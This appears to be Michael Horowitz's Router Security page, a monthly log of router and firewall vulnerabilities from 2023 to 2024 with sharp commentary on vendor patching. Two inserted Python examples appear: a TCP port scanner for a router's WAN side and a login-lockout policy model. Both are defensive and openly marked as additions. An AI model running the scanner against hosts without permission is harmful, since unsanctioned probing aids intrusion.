Router Security | Router Bugs Flaws Hacks and Vulnerabilities |
Website by Michael Horowitz |
If you care about the security of your router, and you should, it is best to avoid consumer grade routers. On the whole, the software in these routers is buggy as heck. Below is what I base this opinion on.
This page documents the existence of bugs in routers. Starting April 2018, I also track routers in the news which details the exploitation of router flaws.
You may be thinking that all software is buggy, but router software is probably worse. One reason for this is your ISP, which may have configured the router/gateway in an insecure way, either on purpose, to allow spying, or out of laziness or incompetence. Another reason is cost: router software is developed as cheaply as possible.
BIG BUGS: A number of flaws stand out. The port 32764 issue from January 2014 and April 2014 for example. A router backdoor was exposed, then instead of being removed, was just better hidden. Another flaw not to be missed is the Misfortune Cookie from December 2014. Then, of course, there is WPS, the electronic equivalent of a "hack me" sign on your back. Other huge flaws involved UPnP being exposed to the Internet and file sharing on a USB port.
THE US GOVERNMENT: In January 2017, the FTC accused D-Link of leaving its routers and webcam devices vulnerable to hackers. A lawsuit alleged that D-Link "failed to take reasonable steps to protect their routers and IP cameras from widely known and reasonably foreseeable risks of unauthorized access." D-Link was also accused of misleading the public about the security of their devices. D-Link denied they did anything bad. More on the Router News page.
This page has bugs from 2023, 2022, 2021, 2020 and 2019. Older bugs, from 2018 through 2012, are available at the bottom of this page. All the bugs are also available on one B_I_G web page, which makes it easy to find all the issues for any one manufacturer.
DECEMBER 2024
Six buggy Asus routers say bad things about Asus
ASUS Router Improper Input Validation
by Asus December 3, 2024
Six Asus routers are buggy: the RT-AX55, RT-AX56U, RT-AX56U_V2, RT-AX57, RT-AX58U and RT-AX58U_V2. Ho hum, but ... the bug is improper input validation - again. The context here is that just last month (Nov. 2024) Asus issued bug fixes for many of their routers, and one of the bugs they fixed was improper input validation. For example, the AX55, AX57 and AX58 all had new firmware issued just last month. It seems that Asus did a poor job fixing their bugs. Not to mention the large number of bugs they fixed in June 2024, not all that long ago. This time, there is just one bug being fixed, CVE-2024-11985. Last month, Asus danced around the issue of how many bugs they were fixing.
Zyxel bugs: pros and cons
Zyxel security advisory for buffer overflow and post-authentication command injection vulnerabilities in some 4G LTE/5G NR CPE, DSL/Ethernet CPE, fiber ONTs, and WiFi extenders
by Zyxel December 3, 2024
There are three bugs in Zyxel software. Yawn. The bugs affect many different types of Zyxel devices. There are fixes. Yawn. What impresses me, however, is how thorough the company was in researching these bugs. Their writeup has three long lists of vulnerable devices, one for each bug. Typically a bug is reported in one device, that device is fixed and 99 other devices that probably have the same bug are ignored. Not here. The down side, however, is getting the patched software. Zyxel says "For end-users who purchased your Zyxel device yourself, please contact your local Zyxel support team for the new firmware file to ensure optimal protection, or visit Zyxel's Community for further assistance." They link to community.zyxel.com/en which is a generic support site with nothing specific about firmware downloads.
NOVEMBER 2024
Still more critical D-Link router bugs
D-Link tells users to trash old VPN routers over bug too dangerous to identify
by Connor Jones of The Register November 20, 2024
This sure looks like the story below from November 13th, but no. This too is a serious remote code execution (RCE) vulnerability. Here too, the routers are too old to bother fixing and should be replaced. But this is different: "Most of the details about the bug are being kept under wraps given the potential for wide exploitation. Unauthenticated RCE issues are essentially as bad as vulnerabilities get ..." D-Link is offering 20 percent off the price of a new D-Link router. Not a good move, best to avoid D-Link. These routers are vulnerable to this bug and went EoL in May 2024: DSR-150, DSR-150N, DSR-250, DSR-250N. These routers are also vulnerable to this bug, but they went EoL 9 years ago: DSR-500N and DSR-1000N.
Fortinet fails to fix buggy Windows VPN software
Chinese hackers exploit Fortinet VPN zero-day to steal credentials
by Bill Toulas of Bleeping Computer November 18, 2024
There is a bug in the Fortinet Windows VPN client software that allows bad guys to steal credentials after the victim has authenticated to the VPN server. A new report from
Volexity says that they discovered and reported the bug earlier this summer. Here it is November and Fortinet still has not fixed the vulnerability. Volexity says that the FortiClient software fails to clear sensitive information (username, password, VPN gateway, and port) from its memory. How Fortinet failed to fix their software for so long is really hard to imagine.
Palo Alto Network devices have still more bugs
CISA warns of more Palo Alto Networks bugs exploited in attacks
by Sergiu Gatlan of Bleeping Computer November 14, 2024
Note the word "more" in the headline. These bugs are currently being exploited by bad guys. It is more of the usual: one bug lets bad guys run arbitrary OS commands as root, exposing usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls. A second bug provides access to password hashes, usernames, device configurations, and device API keys, and also lets the bad guys create or read arbitrary files.
D-Link ruins the world, yet again
Today It's 60K EoL D-Link Routers That Aren't Getting Patches
by Jeremy Hellstrom of PC Perspective November 13, 2024
Quoting: "No, It's Not A Repeat. Last Week Was 60K NAS Devices. Today in reasons to reconsider purchasing or recommending D-Link products, there are almost 60,000 D-Link DSL6740C routers that hit EoL at the beginning of this year with critical security flaws that will not be patched ... the devices were only ever sold overseas; Taiwan having the most devices ... The vulnerabilities include a 9.8 that allows an attacker to change the password of an existing account on the router, thus granting themselves as much access as they could ever want while simultaneously locking the owner out of their router. There are two more ... It is unreasonable to expect companies to support their devices forever, however with devices that can cause serious havoc across the globe we need something better than a shrug from the manufacturers."
Security updates to most every Asus router
New firmware Update for Enhanced security
by Asus November 4, 2024
Intro: Asus puts all their security problems on one big web page. Their routers (at least most of them) do not self-update, so the web page nags you to do the dirty work. It is also up to you to check for updates, they won't bother emailing you. The security changes are described very vaguely, nothing detailed. They say: "ASUS has released several firmware updates to enhance security" which means many of their routers are buggy. They say "Strengthened input validation and data processing workflows". No one knows what a data processing workflow is. And not validating your inputs is just lazy stupid programming. And "Improved web rendering engine, enhancing browsing experience and security." Again, weasel words looking to sound nice but most likely covering up something ugly. And "Enhanced security of system command processing to guard against potential malicious operations." No doubt, this is a biggy. There's more but you get the point - do a manual update. How many different bugs were fixed? None of your business.
OCTOBER 2024
FortiJump bug in Fortinet FortiManager
Burning Zero Days: FortiJump FortiManager vulnerability used by nation state in espionage via MSPs
by Kevin Beaumont October 23, 2024
There is widespread exploitation of FortiNet products using a zero day and there is not even a lousy CVE (one was issued two days after this article was written). The bug has been under widespread exploitation for a while. By their clamming up, Beaumont argues that the only ones being protected are FortiGate themselves, and any governments that don't want to be embarrassed. FortiManager is a product that manages a bunch of FortiGate firewalls. The FortiManager has a Device Manager that uses FGFM to add new devices and install policy packages and device settings. Quoting: "FortiNet made a number of errors in how this is implemented. For example, out of the box, by default, FortiManager allows any device, even with an unknown serial number, to register with FortiManager automatically and become a managed device ... Once registered, there’s a vulnerability which allows remote code execution on the FortiManager itself via the rogue FortiGate connection. From the FortiManager, you can then manage the legit downstream FortiGate firewalls, view config files, take credentials and alter configurations." Very bad. Worse is that Managed Service Providers often use FortiManager, so when they get compromised so too can all their customers get hacked. Beaumont claims that a state-sponsored group is behind the attacks on this bug. Mandiant says the bug has been exploited since June. Censys says there are over 4,000 FortiManager admin portals exposed to the Internet.
Fortinet Clams up
FortiGate admins report active exploitation 0-day. Vendor isn’t talking.
by Dan Goodin for Ars Technica October 22, 2024
Some mistakes you just can't make. Being aware of a new critical security flaw and saying nothing to your customers, is one of those mistakes. Quoting the article:
"Fortinet, a maker of network security software, has kept a critical vulnerability under wraps for more than a week amid reports that attackers are using it to execute malicious code on servers used by sensitive customer organizations. Fortinet representatives didn’t respond to emailed questions and have yet to release any sort of public advisory detailing the vulnerability or the specific software that’s affected. The lack of transparency is consistent with previous zero-days that have been exploited against Fortinet customers. Vulnerability allowing remote code execution has been discussed since at least 9 days ago."
More Big Boys Have Bugs
CISA says critical Fortinet RCE flaw now exploited in attacks
by Sergiu Gatlan of Bleeping Computer October 9, 2024
Bad guys have been found actively exploiting a critical FortiOS remote code execution bug. Think Little Bobby Tables and not sanitizing your input. The bug lets bad guys execute commands or code on vulnerable devices in an attack that is low-complexity and does not require user interaction. Fortinet disclosed and patched this security flaw in February 2024. Yet, the US Government just got around to mandating that the fix be installed by October 30, 2024. Eight months to fix a critical bug. Why not just hang a WE USE FORTINET - HACK US poster on every government building?
The Big Boys Have Bugs Too
Palo Alto Networks warns of firewall hijack bugs with public exploit
by Sergiu Gatlan of Bleeping Computer October 9, 2024
What does it say when a device purchased to increase security is itself buggy? So buggy, that it lowers your security. There are 5 bugs, all have patches available. I can't judge 4 of the bugs, but the 5th is shameful, they put passwords in logs in clear text. Not what a security focused device should do. After installing patched software, Palo Alto users are advised to change all userids and passwords. Ugh. For context, back in April 2024, Palo Alto was seriously vulnerable - they had to release a fix for a maximum-severity zero-day bug that bad guys were found exploiting.
14 (not a typo, really 14) bugs in DrayTek routers
DrayTek fixed critical flaws in over 700,000 exposed routers
by Bill Toulas of Bleeping Computer October 2, 2024
Where do we begin? At least the bugs have been patched. The bugs exist in 24 router models, 11 of which are End-of-Life. Due to the severity of the bugs, DrayTek has made fixes available, even for the 11 non-supported models. They are not D-Link. The most severe bug has a critical rating of 10 out of 10, which is to say: brutal (really very critical). Five of the flaws are said to require immediate attention. Looking at it another way, 2 are critical severity, 9 high severity, and 3 medium severity. DrayTek recommends that the web interface to their routers only be available on the LAN side. Yet, the company that found these bugs, Vedere Labs, found over 704,000 DrayTek Vigor routers exposing their web interface to the internet. No mention was made of whether there is a mobile app for administering DrayTek routers. I looked at the Release Notes for some of the fixed firmwares and they said little more than "better security". That's disappointing.
This article is based on a report by Vedere Labs, which seems to be a subsidiary of Forescout Research. A link to the report is below along with some pretty damning quotes. On the up side, they do say that DrayTek responded promptly to their bug reports.
SEPTEMBER 2024
Disgraceful D-Link bugs
D-Link fixes critical RCE, hardcoded password flaws in WiFi 6 routers
by Bill Toulas of Bleeping Computer September 14, 2024
There are honest mistakes and then there are hard coded passwords which are inexcusable, disgraceful mistakes. D-Link disclosed and fixed five bugs in three of their routers: the COVR-X1870, the DIR-X4860 and the DIR-X5460. Three bugs are rated critical. To me, the worst of the five is that the Telnet service is enabled when the WAN port is active, allowing remote access with hard-coded passwords. The buggy routers are popular with consumers, especially among those looking for high-end WiFi 6 and mesh networking. It took D-Link over 3 months to fix the bugs. Seems like a long time. The article did not say if any of these bugs are the same as those in the DIR-846W (see below).
Throw away the D-Link DIR-846W router
D-Link says it is not fixing four RCE flaws in DIR-846W routers
by Bill Toulas of Bleeping Computer September 3, 2024
Yet another instance of router flaws that will not be fixed. And, not said in the article, is whether any other D-Link routers suffer from the same bugs. Chances are they do. As to the details: there are four remote code execution flaws in all versions of the D-Link DIR-846W router and the bugs will not be fixed. Three of the bugs are rated critical and do not require authentication. DIR-846W routers were sold primarily outside the U.S. The model is still sold in some markets, including Latin America.
Zyxel bugs
Security Advisories from Zyxel
Lots of Zyxel bugs in September.
On the 3rd, they issued a security advisory for OS command injection vulnerability in APs and security router devices. Also on the 3rd, they issued a security advisory for multiple vulnerabilities in firewalls. And still on the 3rd, another security advisory for a buffer overflow bug in some 5G NR CPE, DSL/Ethernet CPE, fiber ONT, WiFi extender, and security router devices. Then, a week later, on the 10th a security advisory for an insufficient entropy bug with web authentication tokens in their GS1900 series switches. Also on the 10th, an advisory for an OS command injection bug in their NAS products.
AUGUST 2024
Critical Sonicwall bug
SonicOS Improper Access Control Vulnerability
a Security Advisory from SonicWall August 22, 2024
Quoting: "An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and ... causing the firewall to crash." This means, in simple terms, bad guys can get in without knowing any passwords. The bug is being exploited in the wild, as of early September 2024. A patch was released at the end of August.
JULY 2024
Cisco, yet again
Vulnerability in Cisco Smart Software Manager lets attackers change any user password
by Dan Goodin of Ars Technica July 17, 2024
The severity of the bug, tracked as CVE-2024-20419, is rated 10, out of 10. This is as rare as the Hope Diamond. The bug is due to a buggy implementation of the password-change process. Bad guys just need to send bad HTTP requests to a vulnerable device. A successful exploit allows the bad guy to access the web interface or the API with the privileges of the compromised user. There are no workarounds. Ars readers made many comments to the article.
Sonicwall accused of hiding a security bug
Sonicwall hidden security bug
by Catalin Cimpanu in the Risky Business security newsletter July 17, 2024
Yet another example of how high end networking devices do not ensure good security. Quoting from the newsletter: "Sonicwall hidden security bug: Vulnerability disclosure platform SSD has accused Sonicwall of secretly patching a major security flaw in its SMA100 security appliances. SSD says SMA100 appliances contained a vulnerability in a feature called Classic Mode that could have been abused for RCE attacks on authenticated users. The security firm claims Sonicwall removed Classic Mode from SMA100 devices last November without telling users of the possible threat. Sonicwall didn't include the removal in patch notes, didn't assign a CVE for the bug, and did not warn customers still using older firmware. SSD has now released a write-up and exploit code."
JUNE 2024
Critical bug in Juniper routers
Juniper Networks flings out emergency patches for perfect 10 router vulnerability
by Connor Jones of The Register July 1, 2024
Juniper Networks devices are high end. Very high. A critical bug in some Juniper devices forced the company to issue emergency patches last week. The bug, an authentication bypass issue (CVE-2024-2973) was rated 10 out of 10 which is very rare. The buggy devices are the Juniper Smart Session Router, their Session Smart Conductor management platform, and WAN Assurance Routers. Only devices using high-availability redundant configurations are vulnerable. This is one indication of how high end Juniper products are - they actually researched the problem and reported on which of their devices are vulnerable and which are not. Very different from consumer routers.
Bug in D-Link router illustrates much about consumer routers
Hackers exploit critical D-Link DIR-859 router flaw to steal passwords
by Bill Toulas of Bleeping Computer June 29, 2024
The D-Link DIR-859 router is old and has been retired (End of Life or EoL) by the company. It also has a critical bug that lets bad guys get total control of the router. The points that this illustrates about consumer routers:
A flood of bugs in Asus routers
High-severity vulnerabilities affect a wide range of Asus router models
by Dan Goodin of Ars Technica June 17, 2024
Yikes. Multiple critical vulnerabilities that allow bad guys to remotely take control of many Asus router models. No authentication needed. No mistake by the router owner or users needed. One bug (CVE-2024-3080) is an authentication bypass flaw that lets remote attackers log into a device. Routers with this bug are the Asus XT8, XT8_V2, RT-AX88U, RT-AX58U, RT-AX57, RT-AC86U, RT-AC68U. These same models also suffer from a second bug. A third bug allows remote hackers to execute commands with no user authentication. That bug affects these models: DSL-N12U_C1, DSL-N12U_D1, DSL-N14U, DSL-N14U_B1, DSL-N16, DSL-N17U, DSL-N55U_C1, DSL-N55U_D1, DSL-N66U, DSL-AC51/DSL-AC750, DSL-AC52U, DSL-AC55U, DSL-AC56U. There are fixes for these models. However, the same third bug is in these models which are too old and will not be fixed: DSL-N10_C1, DSL-N10_D1, DSL-N10P_C1, DSL-N12E_C1, DSL-N16P, DSL-N16U, DSL-AC52 and DSL-AC55. You might think if you owned an Asus router and registered with them, that they would tell you about critical updates like this by email. But, no. Some of these models can auto-update but there are complaints about the Asus auto updating system. Ars reader comments show some very unhappy customers who tried to install the patches. Three critical bugs. At some point, you have to wonder if maybe Asus is just not very good at this whole router thing.
Proving this theory is the article below from Bleeping Computer. It adds that ASUS has also updated Download Master, a utility that enables you to download files directly to a USB storage device connected to the router. It supports torrent, HTTP and FTP with the last two being miserably insecure. The update fixes five medium to high-severity bugs.
So, that's 8 recent bugs, if you are counting.
MAY 2024
TP-Link router with a HUGE bug
Security Advisory: Remote Command Execution on TP-Link Archer C5400X
by OneKey May 27, 2024
This is a huge bug, the severity was rated 10 out of 10, which is pretty rare. The router exposes a network listener on TCP ports 8888, 8889, and 8890. This listener software is vulnerable to command injection and buffer overflows. A bad guy that exploits this flaw gets total control of the router. Game over. What is not addressed, either by OneKey, the company that found the bug, or by TP-Link, is whether this is the only router with the bug. TP-Link makes dozens of different routers. This is the typical pattern with consumer routers: a security person/company tests one model, finds a bug, the company fixes the bug in that one model and no one bothers to check any other models running similar firmware. On the page on this site about dealing with a new router, I suggest connecting it to an existing router and running nmap or another port scan product on the WAN port of the router. This would have exposed the open TCP ports. No consumer router should have any open ports out-of-the-box.
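The WAN-side port check suggested above, as an added example (it is not code from this site, from OneKey or from TP-Link): a plain TCP connect scan of the address a new router's WAN port picked up from an existing LAN, with the rule that, on a factory-fresh router, any port that answers is a finding. WAN_ADDR is a placeholder documentation address, PORTS_OF_INTEREST is my own short list of ports worth probing first (it includes the 8888 to 8890 listener from the advisory), and demo() stands up a listener on the local machine so the scanner can be checked without a router.

```python
"""Connect-scan a router's WAN-facing address and flag any open TCP port."""
import socket

WAN_ADDR = "192.0.2.10"   # placeholder: the address your LAN handed the new router's WAN port
# Assumed starting list: common admin/remote-management ports plus the
# 8888-8890 listener named in the TP-Link advisory. Widen it as you see fit.
PORTS_OF_INTEREST = [21, 22, 23, 53, 80, 443, 7547, 8080, 8443, 8888, 8889, 8890]


def tcp_port_is_open(host, port, timeout=0.5):
    """True only if a full TCP handshake completes (a real listener answered)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            return sock.connect_ex((host, port)) == 0
        except OSError:          # unreachable host, timeout, name failure
            return False


def scan_ports(host, ports, timeout=0.5):
    """Return the sorted list of ports on host that accepted a connection."""
    return sorted(p for p in set(ports) if tcp_port_is_open(host, p, timeout))


def assess_wan_exposure(open_ports):
    """Verdict for a factory-fresh router: any WAN-side listener is a FAIL."""
    if not open_ports:
        return "PASS: no TCP ports reachable from the WAN side"
    return "FAIL: WAN-reachable TCP ports " + ", ".join(str(p) for p in open_ports)


def demo():
    """Self-check without a router: a local listener plays the exposed service.

    Returns (listening_port, ports_found) so the result can be verified.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))           # kernel picks a free port
    listener.listen(5)
    open_port = listener.getsockname()[1]
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))              # grab a second free port ...
    closed_port = probe.getsockname()[1]
    probe.close()                             # ... and release it: nothing listens there now
    try:
        found = scan_ports("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
    return open_port, found


if __name__ == "__main__":
    port, found = demo()
    print("self-check:", assess_wan_exposure(found), f"(constructed listener on {port})")
    print("router WAN:", assess_wan_exposure(scan_ports(WAN_ADDR, PORTS_OF_INTEREST)))
```

A connect scan only finds TCP listeners; it will not show UDP services (for example the UPnP/SSDP exposure mentioned at the top of this page), so nmap with a UDP scan is still worth running as the author suggests.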
APRIL 2024
None of your business
Asus Product Security Advisory
by Asus April 12, 2024
Just like the TP-Link bugs below, this too, illustrates what is wrong with consumer routers. The Asus Product Security Advisory page shows that security related bug fixes were issued for these models: EBM68, EBR63 and RT-AX57 Go. Period. That's all it says. What was the bug? How serious is it? Is there a work-around? Were there multiple bugs? None of your [expletive deleted] business. Asus customers are not entitled to this information.
Bugs in TP-Link routers and APs
Vulnerability in some TP-Link routers could lead to factory reset
by Jonathan Munshaw of Cisco Talos April 10, 2024
These bugs illustrate everything wrong with consumer routers. For one thing, which models are buggy? Talos cannot test every TP-Link device; they test a few and find bugs. What about the others? Talos can't know and TP-Link says nothing, issuing fixes for the few tested models. Also, TP-Link says nothing about any of this on their Security Advisory page. This is quite different from the March 2024 bug in Netgear routers shown below. There, Netgear was very clear about the affected models. Talos found four bugs and told TP-Link on Dec 11, 2023. Fixes were issued April 3, 2024. Too long? Matter of opinion, judge for yourself.
MARCH 2024
Bug in 3 Netgear routers
Netgear RAX30 JSON Parsing getblockschedule() stack-based buffer overflow vulnerability
by Cisco Talos March 7, 2024
"A stack-based buffer overflow vulnerability exists in the JSON Parsing getblockschedule() functionality of Netgear RAX30 ... A specially crafted HTTP request can lead to code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability." Discovered by Michael Gentile of Cisco Talos. Not the worst bug as the bad guy has to be on your LAN to exploit it. Netgear is clear about which models are buggy: RAX28, RAX29 and RAX30. Talos told Netgear about the bug Dec 6, 2023. Netgear issued a fix March 6, 2024.
FEBRUARY 2024
Lots of critical Fortinet bugs
Fortinet's week to forget: Critical vulns, disclosure screw-ups, and that toothbrush DDoS attack claim
by Connor Jones of The Register February 9, 2024
TLDR: you pay for more security, you end up less secure. And, Fortinet seems like a Mickey Mouse company.
There is "yet another critical security vulnerability in FortiOS". This one is CVE-2024-21762 and it is rated 9.6 for severity. The bug impacts unsupported versions of FortiOS and the company will not issue fixes for those versions, forcing customers to upgrade or switch vendors. This critical bug comes a few days after the disclosure of two other critical FortiOS bugs on February 6. The earlier disclosure "... immediately attracted our attention since it's not too often we hear about two maximum severity bugs being disclosed on the same day, impacting a major security product like FortiSIEM. However, that's what happened on Tuesday with both CVE-2024-23108 and CVE-2024-23109 appearing in the National Vulnerability Database (NVD)."
On top of the three critical bugs, the way Fortinet handled things was shameful. The Register called them "unprofessional". In regard to the first two bugs, the article says "Firstly, Fortinet backtracked and said these weren't vulnerabilities at all, instead explaining that they were issued in error and were duplicates of the single vulnerability mentioned in the aforementioned October advisory - CVE-2023-34992. Then, within hours of this, the company backtracked again saying that yes, actually, these are two new vulnerabilities - two bypasses for October's CVE-2023-34992. This came after the researcher credited with the discoveries published the email from Fortinet confirming the findings were indeed actual vulnerabilities".
DECEMBER 2023
21 Bugs in Sierra Wireless routers
Sierra: 21 vulnerabilities impact critical infrastructure routers
by Bill Toulas of Bleeping Computer December 6, 2023
"A set of 21 newly discovered vulnerabilities impact Sierra OT/IoT routers and threaten critical infrastructure with remote code execution, unauthorized access, cross-site scripting, authentication bypass, and denial of service attacks." Catch that? 21 bugs. 21. The flaws were discovered by Forescout Vedere Labs. They affect Sierra Wireless AirLink cellular routers and open-source components like TinyXML and OpenNDS. TinyXML is EoL, so no fix there. The other bugs have available fixes. One bug is considered critical, eight of them are high severity score, and a dozen were considered a medium risk. Forescout found over 86,000 AirLink routers exposed online in organizations engaged in power distribution, vehicle tracking, waste management, and national health services.
OCTOBER 2023
Chinese hackers must love Cisco. Cisco customers, not so much
'Cisco buried the lede.' Over 10,000 network devices backdoored through unpatched zero day
by Dan Goodin for Ars Technica October 17, 2023
Yet another Cisco shit show. Their devices are being hacked left and right. It's a new bug and there was no fix at the time this was publicly disclosed. The bug is CVE-2023-20198 and it is rated 10 out of 10, the worst possible case. The bug is relatively easy to exploit. The bug is in the Web User Interface of their IOS XE software. The number of already hacked devices came from security firm VulnCheck and they had not finished their scan when the article was written. About a week after the s... hit the fan, it was disclosed that over 40,000 Cisco devices had been hacked. The bug lets a bad guy create an admin account on the vulnerable device. Cisco released a fix on Oct 23, 2023.
Buggy software on high end hardware
Juniper Networks Patches Over 30 Vulnerabilities in Junos OS
by Ionut Arghire of Security Week October 13, 2023
Juniper Networks patches over 30 vulnerabilities in Junos OS and Junos OS Evolved, including nine high-severity bugs. This is bad enough, but it was only two months ago, that Juniper patched another clump of severe bugs. My writeup for those bugs is below, filed under September. They are quite the bug factory.
Cisco makes the same huge mistake over and over
Cisco Can’t Stop Using Hard-Coded Passwords
by Bruce Schneier October 11, 2023
Quoting: "This is not the first time Cisco products have had hard-coded passwords made public. You’d think it would learn."
SEPTEMBER 2023
Patched Juniper bugs being ignored by nerds
Thousands of Juniper Junos firewalls still open to hijacks, exploit code available to all
by Jessica Lyons Hardcastle of The Register September 18, 2023
On August 17th of this year, Juniper revealed and addressed five bugs that appear in all versions of Junos OS on SRX firewalls and EX Series switches. Then, on August 25, watchTowr published a proof of concept exploit for two of the bugs, used together, that allowed unauthenticated bad guys to get remote code execution by uploading two files. Then, on September 18th, VulnCheck CTO Jacob Baines published a report claiming that just one of the bugs, all by itself, was sufficient for remote bad guys to totally hack a buggy device. VulnCheck has also released a scanning tool to identify firewalls vulnerable to this bug. VulnCheck believes the majority of affected internet-facing firewalls (79 percent or about 15,000 devices) still are not patched. Quoting: "Juniper did not respond to The Register's inquiries about the new RCE exploit, the confusing CVE descriptions, or the number of still-vulnerable devices."
Huge security flaws in 3 Asus routers
ASUS routers vulnerable to critical remote code execution flaws
by Bill Toulas of Bleeping Computer September 5, 2023
Lazy programming strikes again. There is no excuse for this crap other than second (or third) rate programmers. The Asus RT-AX55, RT-AX56U_V2 and RT-AC86U routers all have critical security bugs that are as bad as bad gets. These are high end models favored by gamers for their performance. The bugs are known as format string errors. That is polite talk. In simpler terms user input was not sanitized. Little Bobby Tables. The bugs can be exploited remotely and without authentication, potentially allowing remote code execution. Bug fixes have been trickling out over the last couple months.
JULY 2023
Mikrotik is clearly not trustworthy. Their poor security practices make a bug much worse
Super Admin elevation bug puts 900,000 MikroTik devices at risk
by Bill Toulas of Bleeping Computer of July 25, 2023
A bug, known as CVE-2023-30799, allows bad guys with an existing admin account to elevate their privileges to "super-admin", a level that was never intended to be given to anyone. This level of access was intended for use only by certain parts of the router operating system. Although the requirement to first have an admin account sounds like a high bar to clear, the article explains that due to generally miserable security practices, it is not a very high bar. First off, the Mikrotik RouterOS system does not prevent password brute-force attacks. And, it comes with a default admin userid, as do many routers. To me, the biggest disgrace is that until October 2021 the default admin password was an empty string. Clearly Mikrotik cares nothing about security. In contrast, Peplink forces you to change the router password immediately after the default one is used the first time. And, RouterOS will accept any password, there is no such thing as too short a password. The bug was first disclosed to Mikrotik in June 2022 and they fixed it 4 months later in the stable version of RouterOS. The flaw was found by Margin Research employees, Ian Dupont and Harrison Green. However, Mikrotik did not fix the bug in the long-term version of the OS until just now (July 2023). Why the delay? According to VulnCheck, the long-term version of the OS was only fixed after they nagged Mikrotik about it. Oopsie. One estimate is that 474,000 Mikrotik routers expose their web interface to the Internet and thus are vulnerable.
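The three practices contrasted above (a default credential that must be changed on first use, a minimum password length, and a lockout that makes brute force impractical) as a small login-policy model. This is an added example, not RouterOS or Peplink code; the class name RouterAdminAccount, the return strings and the thresholds MIN_PASSWORD_LEN, MAX_FAILURES and LOCKOUT_SECONDS are my own choices.

```python
"""Router admin login policy: forced first-use password change, minimum
length, and lockout after repeated failures (constructed example)."""
import hashlib
import hmac
import os
import time

MIN_PASSWORD_LEN = 8      # illustrative threshold
MAX_FAILURES = 5          # consecutive wrong passwords before lockout
LOCKOUT_SECONDS = 300     # illustrative lockout length


def _derive(password, salt):
    # Slow, salted hash: a leaked config backup should not hand over the password.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)


class RouterAdminAccount:
    def __init__(self, default_password="", clock=time.monotonic):
        # The shipped credential may even be empty, as RouterOS's was before
        # October 2021; the point is that it can only be used to set a real one.
        self._clock = clock
        self._salt = os.urandom(16)
        self._hash = _derive(default_password, self._salt)
        self.must_change_password = True
        self._failures = 0
        self._locked_until = 0.0

    def login(self, password):
        """Return 'ok', 'change_required', 'denied' or 'locked'."""
        now = self._clock()
        if now < self._locked_until:
            return "locked"               # refuse before checking the password
        if hmac.compare_digest(self._hash, _derive(password, self._salt)):
            self._failures = 0
            return "change_required" if self.must_change_password else "ok"
        self._failures += 1
        if self._failures >= MAX_FAILURES:
            self._failures = 0
            self._locked_until = now + LOCKOUT_SECONDS
            return "locked"
        return "denied"

    def set_password(self, new_password):
        """Reject short passwords; on success the default credential is retired."""
        if len(new_password) < MIN_PASSWORD_LEN:
            return False
        self._salt = os.urandom(16)
        self._hash = _derive(new_password, self._salt)
        self.must_change_password = False
        return True


if __name__ == "__main__":
    acct = RouterAdminAccount()                     # ships with an empty password
    print(acct.login(""))                           # change_required
    print(acct.set_password("short"))               # False
    print(acct.set_password("correct horse battery"))  # True
    print([acct.login("guess") for _ in range(MAX_FAILURES)][-1])  # locked
```

The lockout here is per account; a real device would also throttle per source address so that one attacker cannot lock the owner out of their own router, which is the trade-off the D-Link DSL6740C write-up above (attacker changes the password, owner locked out) makes concrete.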
JUNE 2023
Fortinet again
Fortinet fixes critical RCE flaw in Fortigate SSL-VPN devices, patch now
by Lawrence Abrams of Bleeping Computer June 11, 2023
Fortinet devices are popular, making them a prime target for attacks. This bug is estimated to impact over 500,000 devices. Yikes. Fortinet is known to push out security patches prior to disclosing critical vulnerabilities, to give customers time to update their devices before threat actors can reverse engineer the patches. They seem to have done so here: fixes are available for an undisclosed, critical pre-authentication remote code execution vulnerability known as CVE-2023-27997 (Fortinet calls it FG-IR-23-097). The bug is a heap-based buffer overflow in FortiOS and FortiProxy SSL-VPN. It can let unauthenticated bad guys run software on the box (RCE). One article said the bug was discovered during a code audit of the SSL-VPN module following attacks against government organizations exploiting the recent FortiOS bug known as CVE-2022-42475. Another article said it was discovered by Lexfo Security researchers Charles Fol and Dany Bach.
Update: 300,000+ Fortinet firewalls vulnerable to critical FortiOS RCE bug by Bill Toulas of Bleeping Computer. July 3, 2023. If you thought a critical bug in a critical device would be quickly fixed, you don't know how IT works in 2023. Security company Bishop Fox reported that more than 2 weeks after Fortinet issued their bug fix, most Internet-exposed FortiGate devices remained vulnerable. Specifically, Bishop Fox found 153,414 FortiGate firewall boxes had been updated and over 300,000 had not. What could be worse? They also found that many of the exposed FortiGate devices had not received an update for the past eight years. 8 [expletive] years.
Asus fixes NINE security flaws
ASUS urges customers to patch critical router vulnerabilities
by Sergiu Gatlan of Bleeping Computer June 19, 2023
Asus released bug fixes for nine security flaws that affect many different models. Two fixes are rated Critical and six are rated High in severity. One is still being evaluated. The vulnerable models are: GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, TUF-AX5400. That the bugs affect 19 different models is an improvement, and a big one at that. Many reports about router bugs are said to only apply to a single model and I very much doubt that is ever true. Full details from Asus:
Fixed CVE-2023-28702, CVE-2023-28703, CVE-2023-31195, CVE-2022-46871, CVE-2022-38105, CVE-2022-35401, CVE-2018-1160, CVE-2022-38393, CVE-2022-26376
Fixed DoS vulnerabilities in firewall configuration pages.
Fixed DoS vulnerabilities in httpd.
Fixed information disclosure vulnerability.
Fixed null pointer dereference vulnerabilities.
Fixed the cfg server vulnerability.
Fixed the vulnerability in the logmessage function.
Fixed Client DOM Stored XSS
Fixed HTTP response splitting vulnerability
Fixed status page HTML vulnerability.
Fixed HTTP response splitting vulnerability.
Fixed Samba related vulnerabilities.
Fixed Open redirect vulnerability.
Fixed token authentication security issues.
Fixed security issues on the status page.
Enabled and supported ECDSA certificates for Let's Encrypt.
Enhanced protection for credentials.
Enhanced protection for OTA firmware updates.
